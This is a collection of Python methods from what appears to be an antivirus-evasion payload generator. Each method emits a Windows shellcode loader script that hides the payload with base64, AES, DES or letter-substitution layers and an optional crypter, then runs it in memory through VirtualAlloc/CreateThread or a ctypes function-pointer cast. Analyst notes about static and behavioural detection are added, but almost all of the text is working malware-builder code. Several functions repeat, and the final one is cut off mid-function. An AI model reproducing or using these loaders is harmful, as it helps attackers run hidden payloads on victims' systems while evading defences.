def generate(self):
    """Return the source text of a Python 2 script that loads shellcode on Windows.

    The shellcode is base64-encoded and embedded as a string literal under
    randomly named variables. The ``inject_method`` option selects one of two
    loaders in the emitted script:

    * ``"virtual"``: VirtualAlloc, RtlMoveMemory, CreateThread, WaitForSingleObject.
    * anything else: ``create_string_buffer`` plus a cast to ``CFUNCTYPE(c_void_p)``,
      which is then called.

    If ``use_pyherion`` is ``"y"`` the text is passed through
    ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: the base64 layer and the random identifiers only change the
    static text. The Win32 call sequence and the ctypes function-pointer cast
    are unchanged, and those are what behavioural detection observes.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        # Generate shellcode (per the original comment, via msfvenom; the
        # generator object is set up outside this method).
        Shellcode = self.shellcode.generate()
        # Base64-encode the shellcode for embedding as a string literal.
        EncodedShellcode = base64.b64encode(Shellcode)
        # Random identifiers used inside the emitted script.
        ShellcodeVariableName = randomizer.randomString()
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        RandT = randomizer.randomString()
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'import base64\n'
        PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
        # str.decode('base64') and the 'string_escape' codec exist only in
        # Python 2, so the emitted script is Python 2 source.
        PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        # An RWX allocation made by a script interpreter is a common
        # behavioural detection signal.
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # A timeout of -1 is INFINITE: the script blocks until the thread exits.
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)
        return PayloadCode
    else:
        # Generate shellcode (per the original comment, via msfvenom).
        Shellcode = self.shellcode.generate()
        # Random identifiers used inside the emitted script.
        ShellcodeVariableName = randomizer.randomString()
        RandShellcode = randomizer.randomString()
        # NOTE(review): RandReverseShell is generated but never used in this branch.
        RandReverseShell = randomizer.randomString()
        RandMemoryShell = randomizer.randomString()
        DecodedShellcode = randomizer.randomString()
        # Base64-encode the shellcode for embedding as a string literal.
        EncodedShellcode = base64.b64encode(Shellcode)
        PayloadCode = 'from ctypes import *\n'
        PayloadCode += 'import base64\n'
        PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
        PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
        # The emitted script casts a ctypes string buffer to a function
        # pointer and calls it; no VirtualAlloc call appears in this variant.
        PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
        PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
        PayloadCode += RandShellcode + '()'
        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)
        return PayloadCode
def generate(self):
    """Return the source text of a Python script that loads shellcode via VirtualAlloc.

    The shellcode text is embedded without any encoding layer, under random
    variable names. If ``use_pyherion`` is ``"y"`` the text is passed through
    ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: the emitted script always performs VirtualAlloc (RWX),
    RtlMoveMemory, CreateThread and WaitForSingleObject in that order. Only
    the identifier names vary between builds.
    """
    # Generate shellcode (per the original comment, via msfvenom); this
    # variant creates the generator object itself.
    self.shellcode = shellcode.Shellcode()
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    # Build the emitted script line by line.
    PayloadCode = 'import ctypes\n'
    # The shellcode is spliced into a single-quoted literal as-is; presumably
    # generate() returns escaped text such as "\x..", confirm against Shellcode.
    PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python script that loads shellcode via VirtualAlloc.

    The shellcode text from ``self.shellcode.generate()`` is embedded without
    any encoding layer, under random variable names. If ``use_pyherion`` is
    ``"y"`` the text is passed through ``crypters.pyherion`` (defined
    elsewhere) before it is returned.

    Analyst note: the identifiers are random per build, but the emitted
    kernel32 call sequence and its constant arguments are fixed.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    # Build the emitted script line by line.
    PayloadCode = "import ctypes\n"
    PayloadCode += ShellcodeVariableName + " = bytearray('" + Shellcode + "')\n"
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += (
        RandPtr
        + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
        + ShellcodeVariableName
        + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
    )
    PayloadCode += (
        RandBuf
        + " = (ctypes.c_char * len("
        + ShellcodeVariableName
        + ")).from_buffer("
        + ShellcodeVariableName
        + ")\n"
    )
    PayloadCode += (
        "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
        + RandPtr
        + "),"
        + RandBuf
        + ",ctypes.c_int(len("
        + ShellcodeVariableName
        + ")))\n"
    )
    PayloadCode += (
        RandHt
        + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
        + RandPtr
        + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
    )
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python 2 script that AES-decrypts and loads shellcode.

    The shellcode is encrypted here with a random key through
    ``encryption.EncodeAES`` (defined elsewhere). The emitted script contains
    the ciphertext, the key and a decrypt lambda, followed by the VirtualAlloc
    loader. If ``use_pyherion`` is ``"y"`` the text is passed through
    ``crypters.pyherion`` before it is returned.

    Analyst note: the AES key is written into the emitted script as a string
    literal next to the ciphertext, so the layer can be reversed statically
    from the script alone. The script also imports ``Crypto.Cipher.AES``,
    which is itself a useful static indicator.
    """
    # Generate shellcode (per the original comment, via msfvenom); this
    # variant creates the generator object itself.
    self.shellcode = shellcode.Shellcode()
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    # NOTE(review): ShellcodeVariableName is generated but not used below.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()
    # Random AES key (length and alphabet are decided by randomizer.randomKey).
    secret = randomizer.randomKey()
    # AES.new() is called with the key only, so no mode or IV is given;
    # PyCrypto then defaults to ECB. Confirm against the installed library.
    cipher = AES.new(secret)
    EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
    # Build the emitted script line by line.
    PayloadCode = 'import ctypes\n'
    PayloadCode += 'from Crypto.Cipher import AES\n'
    PayloadCode += 'import base64\n'
    PayloadCode += 'import os\n'
    # The emitted decrypt lambda strips trailing '{' padding characters.
    PayloadCode += RandPadding + ' = \'{\'\n'
    PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
    # The key is emitted in clear text.
    PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
    PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
    PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python 2 script that un-substitutes and loads shellcode.

    The escaped shellcode text has every ``"c"`` replaced by ``"t"`` before it
    is embedded. The emitted script applies the reverse translation, decodes
    the escapes and runs the VirtualAlloc loader. If ``use_pyherion`` is
    ``"y"`` the text is passed through ``crypters.pyherion`` (defined
    elsewhere) before it is returned.

    Analyst note: the substitution pair is fixed ("c" and "t") and both
    letters are written into the emitted script, so the encoding is a constant
    transform that can be reversed statically.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    SubbedShellcodeVariableName = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodedLetter = randomizer.randomString()
    RandCorrectLetter = randomizer.randomString()
    RandSubScheme = randomizer.randomString()
    # Letter substitution pair: "c" is written as "t" in the embedded text.
    EncodeWithThis = "c"
    DecodeWithThis = "t"
    # string.maketrans is Python 2 only; this table maps c -> t.
    SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)
    # Escape the shellcode so it can sit inside a double-quoted literal.
    Shellcode = Shellcode.encode("string_escape")
    # Build the emitted script line by line.
    PayloadCode = 'import ctypes\n'
    PayloadCode += 'from string import maketrans\n'
    PayloadCode += RandDecodedLetter + ' = "t"\n'
    PayloadCode += RandCorrectLetter + ' = "c"\n'
    # The emitted table maps t -> c, undoing the substitution at run time.
    PayloadCode += RandSubScheme + ' = maketrans(' + RandDecodedLetter + ', ' + RandCorrectLetter + ')\n'
    PayloadCode += SubbedShellcodeVariableName + ' = \"' + Shellcode.translate( SubScheme) + '\"\n'
    PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
    PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python 2 script that un-substitutes and loads shellcode.

    This variant creates its own ``shellcode.Shellcode()`` generator. The
    escaped shellcode text has every ``"c"`` replaced by ``"t"`` before it is
    embedded, and the emitted script reverses that and runs the VirtualAlloc
    loader. If ``use_pyherion`` is ``"y"`` the text is passed through
    ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: the substitution letters are constants and appear in the
    emitted script, so the text layer can be reversed statically. The kernel32
    call sequence is unchanged by it.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    self.shellcode = shellcode.Shellcode()
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    SubbedShellcodeVariableName = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodedLetter = randomizer.randomString()
    RandCorrectLetter = randomizer.randomString()
    RandSubScheme = randomizer.randomString()
    # Letter substitution pair: "c" is written as "t" in the embedded text.
    EncodeWithThis = "c"
    DecodeWithThis = "t"
    # string.maketrans is Python 2 only; this table maps c -> t.
    SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)
    # Escape the shellcode so it can sit inside a double-quoted literal.
    Shellcode = Shellcode.encode("string_escape")
    # Build the emitted script line by line.
    PayloadCode = 'import ctypes\n'
    PayloadCode += 'from string import maketrans\n'
    PayloadCode += RandDecodedLetter + ' = "t"\n'
    PayloadCode += RandCorrectLetter + ' = "c"\n'
    # The emitted table maps t -> c, undoing the substitution at run time.
    PayloadCode += RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n'
    PayloadCode += SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n'
    PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
    PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python 2 script that AES-decrypts and loads shellcode.

    The shellcode from ``self.shellcode.generate()`` is encrypted with a
    random key through ``encryption.EncodeAES`` (defined elsewhere). The
    emitted script carries the ciphertext, the key and a decrypt lambda,
    followed by the VirtualAlloc loader. If ``use_pyherion`` is ``"y"`` the
    text is passed through ``crypters.pyherion`` before it is returned.

    Analyst note: the key is emitted as a string literal beside the
    ciphertext, so the encrypted layer can be recovered statically from the
    script. The ``Crypto.Cipher`` import is a static indicator.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    # NOTE(review): ShellcodeVariableName is generated but not used below.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    RandDecodeAES = randomizer.randomString()
    RandCipherObject = randomizer.randomString()
    RandDecodedShellcode = randomizer.randomString()
    RandShellCode = randomizer.randomString()
    RandPadding = randomizer.randomString()
    # Random AES key (length and alphabet are decided by randomizer.randomKey).
    secret = randomizer.randomKey()
    # AES.new() is called with the key only, so no mode or IV is given;
    # PyCrypto then defaults to ECB. Confirm against the installed library.
    cipher = AES.new(secret)
    EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
    # Build the emitted script line by line.
    PayloadCode = 'import ctypes\n'
    PayloadCode += 'from Crypto.Cipher import AES\n'
    PayloadCode += 'import base64\n'
    PayloadCode += 'import os\n'
    # The emitted decrypt lambda strips trailing '{' padding characters.
    PayloadCode += RandPadding + ' = \'{\'\n'
    PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
    # The key is emitted in clear text.
    PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
    PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
    PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python 2 script that DES-decrypts and loads shellcode.

    The shellcode is encrypted here with DES in CFB mode under a random
    8-character key and IV. The emitted script carries the key, the IV and the
    escaped ciphertext, decrypts it and runs the VirtualAlloc loader. If
    ``use_pyherion`` is ``"y"`` the text is passed through
    ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: the key and IV are emitted as string literals in the same
    script as the ciphertext, so the layer can be reversed statically. The
    ``Crypto.Cipher.DES`` import is a static indicator.
    """
    # Generate shellcode (per the original comment, via msfvenom); this
    # variant creates the generator object itself.
    self.shellcode = shellcode.Shellcode()
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandIV = randomizer.randomString()
    RandDESKey = randomizer.randomString()
    RandDESPayload = randomizer.randomString()
    RandEncShellCodePayload = randomizer.randomString()
    # randomKey is called with 8, matching DES's 8-byte key and block size.
    iv = randomizer.randomKey(8)
    DESKey = randomizer.randomKey(8)
    # Encrypt the shellcode text with DES in CFB mode.
    desmain = DES.new(DESKey, DES.MODE_CFB, iv)
    EncShellCode = desmain.encrypt(Shellcode)
    # Build the emitted script line by line.
    PayloadCode = 'from Crypto.Cipher import DES\n'
    PayloadCode += 'import ctypes\n'
    # The IV and key are emitted in clear text.
    PayloadCode += RandIV + ' = \'' + iv + '\'\n'
    PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
    PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
    # The ciphertext is escaped so it can sit inside a single-quoted literal.
    PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
    PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE; this final line has no trailing newline.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python 2 script that DES-decrypts and loads shellcode.

    The shellcode from ``self.shellcode.generate()`` is encrypted with DES in
    CFB mode under a random 8-character key and IV. The emitted script carries
    the key, the IV and the escaped ciphertext, decrypts it and runs the
    VirtualAlloc loader. If ``use_pyherion`` is ``"y"`` the text is passed
    through ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: the key and IV sit in the emitted script as plain string
    literals, so the encrypted blob can be decrypted offline. The loader's
    kernel32 calls are the same as in the unencrypted variants.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    ShellcodeVariableName = randomizer.randomString()
    RandIV = randomizer.randomString()
    RandDESKey = randomizer.randomString()
    RandDESPayload = randomizer.randomString()
    RandEncShellCodePayload = randomizer.randomString()
    # randomKey is called with 8, matching DES's 8-byte key and block size.
    iv = randomizer.randomKey(8)
    DESKey = randomizer.randomKey(8)
    # Encrypt the shellcode text with DES in CFB mode.
    desmain = DES.new(DESKey, DES.MODE_CFB, iv)
    EncShellCode = desmain.encrypt(Shellcode)
    # Build the emitted script line by line.
    PayloadCode = 'from Crypto.Cipher import DES\n'
    PayloadCode += 'import ctypes\n'
    # The IV and key are emitted in clear text.
    PayloadCode += RandIV + ' = \'' + iv + '\'\n'
    PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
    PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
    # The ciphertext is escaped so it can sit inside a single-quoted literal.
    PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
    PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE; this final line has no trailing newline.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python script that runs shellcode through a ctypes cast.

    The shellcode text is embedded in a double-quoted literal and copied into
    a ``create_string_buffer``. The buffer is cast to ``CFUNCTYPE(c_void_p)``
    and called. If ``use_pyherion`` is ``"y"`` the text is passed through
    ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: no kernel32 allocation call appears in this variant. The
    static markers are ``from ctypes import *`` followed by a cast of a string
    buffer to a function type that is then invoked.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    RandShellcode = randomizer.randomString()
    RandReverseShell = randomizer.randomString()
    RandMemoryShell = randomizer.randomString()
    PayloadCode = 'from ctypes import *\n'
    # The shellcode is spliced into the literal as-is; presumably generate()
    # returns escaped text such as "\x..", confirm against Shellcode.
    PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
    PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
    PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
    # Final emitted line calls the cast function pointer (no trailing newline).
    PayloadCode += RandShellcode + '()'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python script that loads shellcode via VirtualAlloc.

    The shellcode text from ``self.shellcode.generate()`` is embedded without
    any encoding layer, under random variable names. If ``use_pyherion`` is
    ``"y"`` the text is passed through ``crypters.pyherion`` (defined
    elsewhere) before it is returned.

    Analyst note: only the identifiers vary between builds. The emitted call
    sequence of VirtualAlloc (RWX), RtlMoveMemory, CreateThread and
    WaitForSingleObject is constant.
    """
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    ShellcodeVariableName = randomizer.randomString()
    RandPtr = randomizer.randomString()
    RandBuf = randomizer.randomString()
    RandHt = randomizer.randomString()
    # Build the emitted script line by line.
    PayloadCode = 'import ctypes\n'
    PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
